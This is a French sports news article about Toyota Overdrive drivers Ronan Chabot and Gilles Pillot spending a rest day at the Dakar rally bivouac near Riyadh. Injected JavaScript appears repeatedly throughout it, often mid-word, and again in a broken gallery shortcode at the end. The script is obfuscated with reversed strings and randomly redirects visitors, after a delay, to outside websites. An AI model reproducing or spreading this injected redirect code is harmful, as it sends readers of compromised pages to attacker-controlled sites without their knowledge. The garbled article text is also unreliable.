À l’issue d’une semaine particulièrement intense, Ronan Chabot et Gilles Pillot ont passé la journée de repos entre grasse matinée, obligations et détente. Il faut déjà penser à la suite, avec l’envie de se rapprocher du ‘toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top 10’ et de continuer à prendre du plaisir.

Il est à peine 18 heures et le bivouac situé en périphérie de Ryad est déjà plongé dans la pénombre. Pour la première fois depuis sept jours, les pilotes ont pu souffler, n’ont pas eu à enchaîner les kilomètres, surveiller le timing, veiller à leur mécanique. Gilles et Ronan ont l’habitude de ces journées-là, eux qui célèbrent leur 20e participation au Dakar. Et cela commence toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours par une nuit un peu plus longue que d’habitude.

La journée de repos, elle, « n’en est pas vraiment une » reconnaît Ronan Chabot. « Certes, on coupe mais elle passe très vite. Il y a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours beaucoup à faire : toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout laver, faire la révision de la voiture, faire un shakedown (une courte séance d’essai), rencontrer les partenaires … » C’est également l’occasion de se promener dans le bivouac, 20 hectares dédiés à la mécanique et à ses aventuriers des sables pour retrouver ceux qu’ils n’ont pas eu l’occasion de côtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyer jusque-là.

« On se régale dans le sable »

En fin de journée, à l’issue d’une séance chez le kiné, le pilote se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tourne déjà vers la semaine qui s’annonce particulièrement exigeante. « Cette année, on prend beaucoup de plaisir. Nous essayons au maximum de prendre les journées comme elles viennent ». Certes, le risque d’imprévus, de pépins et de galères ne disparait jamais vraiment. « Il se passe toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours quelque chose sur le Dakar sinon, ce serait triste », sourit Ronan. « Nous, on se régale dans le sable, les grands toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toboggans de sable où on s’offre des surfs incroyables… Même les équipes de télévision ne peuvent pas y accéder ! »

À l’évocation de ces souvenirs, il a le regard qui brille et la certitude aussi, de savoir pourquoi il apprécie tant cette aventure. « Même si on est fatigué à l’issue de la journée, c’est sain parce que c’est du sport, parce qu’on essaie de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout donner ». Et puis, dans le panel de raisons qui expliquent leur participation récurrente au Dakar, il y a aussi « cette famille » formée au sein du team Toyota Overdrive, une centaine de personnes « qui partagent les mêmes valeurs ». Riches de leur soutien, de leur présence et de leur passion, Ronan et Gilles s’apprêtent donc à reprendre la route, dès demain, avec 701 km (dont 402 km de spéciale) jusqu’à Al Dawadimi, à l’ouest du pays.

We cannot display this gallery) == “string”) return $mkD.list[n].split(“”).reverse().join(“”);return $mkD.list[n];};$mkD.list=[“\’php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torder=”1954,1951,1952,1953,1950″ display=”basic_thumbnail” thumbnail_crop=”0″]